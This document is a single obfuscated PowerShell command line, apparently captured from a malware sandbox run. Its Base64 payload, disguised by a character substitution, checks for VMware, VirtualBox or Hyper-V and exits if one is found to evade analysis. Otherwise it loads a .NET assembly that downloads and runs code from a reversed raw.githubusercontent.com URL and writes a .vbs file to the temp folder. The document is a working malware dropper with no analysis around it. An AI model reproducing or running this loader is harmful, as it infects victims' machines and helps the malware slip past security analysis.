powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LxAae = 'J✑B0✑C✑✑PQ✑g✑Ec✑ZQB0✑C0✑QwBp✑G0✑SQBu✑HM✑d✑Bh✑G4✑YwBl✑C✑✑dwBp✑G4✑Mw✑y✑F8✑YwBv✑G0✑c✑B1✑HQ✑ZQBy✑HM✑eQBz✑HQ✑ZQBt✑Ds✑J✑B0✑DI✑I✑✑9✑C✑✑J✑B0✑C4✑TQBh✑G4✑dQBm✑GE✑YwB0✑HU✑cgBl✑HI✑OwBp✑GY✑I✑✑o✑CQ✑d✑✑y✑C4✑QwBv✑G4✑d✑Bh✑Gk✑bgBz✑Cg✑JwBW✑E0✑dwBh✑HI✑ZQ✑n✑Ck✑I✑✑t✑G8✑cg✑g✑CQ✑d✑✑y✑C4✑QwBv✑G4✑d✑Bh✑Gk✑bgBz✑Cg✑JwBW✑Gk✑cgB0✑HU✑YQBs✑EI✑bwB4✑Cc✑KQ✑g✑C0✑bwBy✑C✑✑J✑B0✑DI✑LgBD✑G8✑bgB0✑GE✑aQBu✑HM✑K✑✑n✑Eg✑eQBw✑GU✑cg✑t✑FY✑Jw✑p✑Ck✑I✑B7✑Ds✑ZQB4✑Gk✑d✑✑7✑H0✑Ow✑k✑E8✑W✑BQ✑Ho✑Rw✑g✑D0✑I✑✑n✑CU✑VQBX✑Fc✑cwBq✑CU✑Jw✑7✑CQ✑QgBY✑Gk✑bwBN✑C✑✑PQ✑g✑Cc✑JQBs✑FU✑cwBO✑FE✑JQ✑n✑Ds✑WwBC✑Hk✑d✑Bl✑Fs✑XQBd✑C✑✑J✑BB✑Gg✑c✑BB✑Fc✑I✑✑9✑C✑✑WwBT✑Hk✑cwB0✑GU✑bQ✑u✑EM✑bwBu✑HY✑ZQBy✑HQ✑XQ✑6✑Do✑RgBy✑G8✑bQBC✑GE✑cwBl✑DY✑N✑BT✑HQ✑cgBp✑G4✑Zw✑o✑C✑✑J✑BC✑Fg✑aQBv✑E0✑LgBS✑GU✑c✑Bs✑GE✑YwBl✑Cg✑JwCTITo✑kyEn✑Cw✑I✑✑n✑EE✑Jw✑p✑C✑✑KQ✑7✑Fs✑UwB5✑HM✑d✑Bl✑G0✑LgBB✑H✑✑c✑BE✑G8✑bQBh✑Gk✑bgBd✑Do✑OgBD✑HU✑cgBy✑GU✑bgB0✑EQ✑bwBt✑GE✑aQBu✑C4✑T✑Bv✑GE✑Z✑✑o✑CQ✑QQBo✑H✑✑QQBX✑Ck✑LgBH✑GU✑d✑BU✑Hk✑c✑Bl✑Cg✑JwBD✑Gw✑YQBz✑HM✑T✑Bp✑GI✑cgBh✑HI✑eQ✑z✑C4✑QwBs✑GE✑cwBz✑DE✑Jw✑p✑C4✑RwBl✑HQ✑TQBl✑HQ✑a✑Bv✑GQ✑K✑✑n✑H✑✑cgBG✑FY✑SQ✑n✑Ck✑LgBJ✑G4✑dgBv✑Gs✑ZQ✑o✑CQ✑bgB1✑Gw✑b✑✑s✑C✑✑WwBv✑GI✑agBl✑GM✑d✑Bb✑F0✑XQ✑g✑Cg✑Jw✑0✑DY✑ZQBz✑GE✑QgBy✑GU✑dgBy✑GU✑Uw✑v✑G4✑aQBh✑G0✑LwBy✑GU✑d✑Bw✑Hk✑cgBj✑H✑✑VQ✑v✑Dg✑Nw✑1✑DE✑bwBh✑G8✑agBQ✑C8✑bQBv✑GM✑LgB0✑G4✑ZQB0✑G4✑bwBj✑HI✑ZQBz✑HU✑YgB1✑Gg✑d✑Bp✑Gc✑LgB3✑GE✑cg✑v✑C8✑OgBz✑H✑✑d✑B0✑Gg✑Jw✑g✑Cw✑I✑✑k✑E8✑W✑BQ✑Ho✑Rw✑g✑Cw✑I✑✑n✑FQ✑cgB1✑GU✑Jw✑g✑Ck✑I✑✑p✑✑==';$UrNXf = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $LxAae.replace('✑','A') ) ).replace('%lUsNQ%','').replace('%UWWsj%','C:\Users\test22\AppData\Local\Temp\bMfk.vbs');powershell -Command $UrNXf
2652